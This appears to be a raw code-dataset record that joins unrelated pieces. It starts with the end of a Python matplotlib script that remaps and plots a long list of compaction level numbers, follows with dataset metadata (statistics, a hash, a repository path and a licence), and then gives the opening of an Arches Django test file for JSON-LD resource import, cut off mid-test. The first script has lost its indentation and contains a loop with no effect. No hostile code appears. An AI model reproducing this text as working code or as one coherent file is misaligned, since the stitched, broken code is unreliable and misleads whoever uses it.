1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 2, 3, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
# 0 -> 3 1 ->0 2 -> 1
print( '0 -> 2 1 ->0 2 -> 1 3 -> 0')
for elem in level_int_list:
if elem == 0:
elem = 3
for index, elem in enumerate(level_int_list):
if elem == 0 and index > 120:
level_int_list[index] = 2
if elem == 0 and index < 120:
level_int_list[index] = 1
elif elem == 1 :
level_int_list[index] = 0;
elif elem == 2 :
level_int_list[index] = 1;
elif elem == 3 :
level_int_list[index] = 0;
print(level_int_list)
plt.xlabel('The nth compaction.')
plt.ylabel('Level number')
# ax.yaxis.set_major_formatter(FormatStrFormatter('%1f'))
ax.yaxis.set_major_locator(MultipleLocator(1))
# ax.set_xlim([350, 550]) # 控制X轴的显示范围
plt.scatter(x,level_int_list,s=0.1)
# plt.plot(x,level_str_list,'.','markersize',0.1)
plt.legend() #add this, the label names will be shown
plt.show()
| 164.896226
| 15,036
| 0.377424
| 5,414
| 17,479
| 1.202992
| 0.021426
| 0.684477
| 0.972363
| 1.22647
| 0.857669
| 0.847382
| 0.833103
| 0.827729
| 0.827729
| 0.827269
| 0
| 0.424559
| 0.315579
| 17,479
| 105
| 15,037
| 166.466667
| 0.11987
| 0.897248
| 0
| 0.102041
| 0
| 0
| 0.091598
| 0.015793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.061224
| 0.122449
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
55db599dbdf89b519c6debd6911ceb85d8094fba
| 55,754
|
py
|
Python
|
mapss/static/packages/arches/tests/importer/jsonld_import_tests.py
|
MPI-MAPSS/MAPSS
|
3a5c0109758801717aaa8de1125ca5e98f83d3b4
|
[
"CC0-1.0"
] | null | null | null |
mapss/static/packages/arches/tests/importer/jsonld_import_tests.py
|
MPI-MAPSS/MAPSS
|
3a5c0109758801717aaa8de1125ca5e98f83d3b4
|
[
"CC0-1.0"
] | null | null | null |
mapss/static/packages/arches/tests/importer/jsonld_import_tests.py
|
MPI-MAPSS/MAPSS
|
3a5c0109758801717aaa8de1125ca5e98f83d3b4
|
[
"CC0-1.0"
] | null | null | null |
import os
import json
import csv
import base64
import datetime
from io import BytesIO
from tests import test_settings
from operator import itemgetter
from django.core import management
from django.test.client import RequestFactory, Client
from django.contrib.auth.models import User, Group, AnonymousUser
from django.urls import reverse
from django.db import connection
from tests.base_test import ArchesTestCase, CREATE_TOKEN_SQL
from arches.app.utils.skos import SKOSReader
from arches.app.models.models import TileModel, ResourceInstance
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
from arches.app.utils.data_management.resources.importer import BusinessDataImporter
from arches.app.utils.data_management.resources.exporter import ResourceExporter as BusinessDataExporter
from arches.app.utils.data_management.resource_graphs.importer import import_graph as ResourceGraphImporter
from arches.app.utils.data_management.resources.formats import rdffile
from arches.app.utils.data_management.resources.formats.rdffile import JsonLdReader
from pyld.jsonld import expand
# these tests can be run from the command line via
# python manage.py test tests/importer/jsonld_import_tests.py --settings="tests.test_settings"
class JsonLDImportTests(ArchesTestCase):
@classmethod
def setUpClass(cls):
# This runs once per instantiation
cls.loadOntology()
cls.factory = RequestFactory()
cls.token = "abc123"
cls.client = Client(HTTP_AUTHORIZATION="Bearer %s" % cls.token)
sql_str = CREATE_TOKEN_SQL.format(token=cls.token, user_id=1)
cursor = connection.cursor()
cursor.execute(sql_str)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/jsonld_test_thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/jsonld_test_collections.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/test_1_basic_object.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/test_2_complex_object.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5098-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
with open(os.path.join("tests/fixtures/jsonld_base/models/5098_concept_list.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
management.call_command("datatype", "register", source="tests/fixtures/datatypes/color.py")
management.call_command("datatype", "register", source="tests/fixtures/datatypes/semantic_like.py")
with open(os.path.join("tests/fixtures/jsonld_base/models/5299-basic.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/5299_complex.json"), "rU") as f:
archesfile2 = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile2["graph"])
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5600-external-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5600-external-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5121_false_ambiguity.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/5121_external_model.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/6235_parenttile_id.json"), "rU") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
def setUp(self):
pass
@classmethod
def tearDownClass(cls):
pass
def tearDown(self):
pass
def _create_url(self, graph_id, resource_id):
base_url = reverse(
"resources_graphid",
kwargs={"graphid": graph_id, "resourceid": resource_id},
)
return base_url + "?format=json-ld"
def test_context_caching(self):
data = {
"@context": "https://linked.art/ns/v1/linked-art.json",
"id": "https://linked.art/example/object/3",
"type": "HumanMadeObject",
"_label": "Black and White Photograph of 'St. Sebastian'",
"classified_as": [{"id": "http://vocab.getty.edu/aat/300128359", "type": "Type", "_label": "Black and White Photograph"}],
}
fetch = rdffile.fetch
def tempFetch(url):
raise Exception("This should not happen becauase we cached the doc")
# rdffile.fetch = tempFetch
# # first we test that we can override the fetch function and confirm that it gets called
# with self.assertRaises(Exception):
# jsonld_document = expand(data)
# now set the function back and test normally
rdffile.fetch = fetch
jsonld_document = expand(data)
self.assertTrue(data["@context"] in rdffile.docCache)
# now set it to the temp fetch and confirm that the tempFetch isn't called on subsequent uses as it was initially
rdffile.fetch = tempFetch
jsonld_document = expand(data)
rdffile.fetch = fetch
# now invalidate the cache and make sure it refreshes the doc
rdffile.docCache[data["@context"]]["expires"] = datetime.datetime.now()
jsonld_document = expand(data)
self.assertTrue(rdffile.docCache[data["@context"]]["expires"] > datetime.datetime.now())
self.assertTrue(data["@context"] in rdffile.docCache)
def test_1_basic_import(self):
data = """{
"@id": "http://localhost:8000/resources/221d1154-fa8e-11e9-9cbb-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test!"
}"""
url = self._create_url(
graph_id="bf734b4e-f6b5-11e9-8f09-a4d18cec433a",
resource_id="221d1154-fa8e-11e9-9cbb-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/221d1154-fa8e-11e9-9cbb-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in js)
self.assertTrue(js["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "test!")
def test_1b_basic_post(self):
data = """{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test!"
}"""
url = self._create_url(
graph_id="bf734b4e-f6b5-11e9-8f09-a4d18cec433a",
resource_id="",
)
response = self.client.post(url, data=data, content_type="application/json", HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in js)
self.assertTrue(js["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "test!")
def test_2_complex_import_data(self):
# Note that this tests #5136, as the P101 -> P2 is a concept with a concept
data = """
{
"@id": "http://localhost:8000/resources/12345678-abcd-11e9-9cbb-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use": {
"@id": "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/14c92c17-5e2f-413a-95c2-3c5e41ee87d2",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Meta Type A"
},
"http://www.w3.org/2000/01/rdf-schema#label": "Test Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection": {
"@id": "http://localhost:8000/tile/9c1ec6b9-1094-427f-acf6-e9c3fca643b6/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-10-01"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/6bac5802-a6f8-427c-ba5f-d4b30d5b070e",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Single Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Data",
"http://www.cidoc-crm.org/cidoc-crm/P45_consists_of": [
{
"@id": "http://localhost:8000/concepts/9b61c995-71d8-4bce-987b-0ffa3da4c71c",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material b"
},
{
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": 12
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="12345678-abcd-11e9-9cbb-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/12345678-abcd-11e9-9cbb-3af9d3b32b71")
hagu = "http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use"
p2 = "http://www.cidoc-crm.org/cidoc-crm/P2_has_type"
temp = "http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection"
qual = "http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
self.assertTrue(hagu in js)
use = js[hagu]
self.assertTrue("@id" in use)
self.assertTrue(use["@id"] == "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a")
self.assertTrue(p2 in use)
self.assertTrue(use[p2]["@id"] == "http://localhost:8000/concepts/14c92c17-5e2f-413a-95c2-3c5e41ee87d2")
self.assertTrue(temp in js)
proj = js[temp]
self.assertTrue(qual in proj)
self.assertTrue(proj[qual] == "example")
self.assertTrue(note in js)
self.assertTrue(js[note] == "Test Data")
self.assertTrue(pts in js)
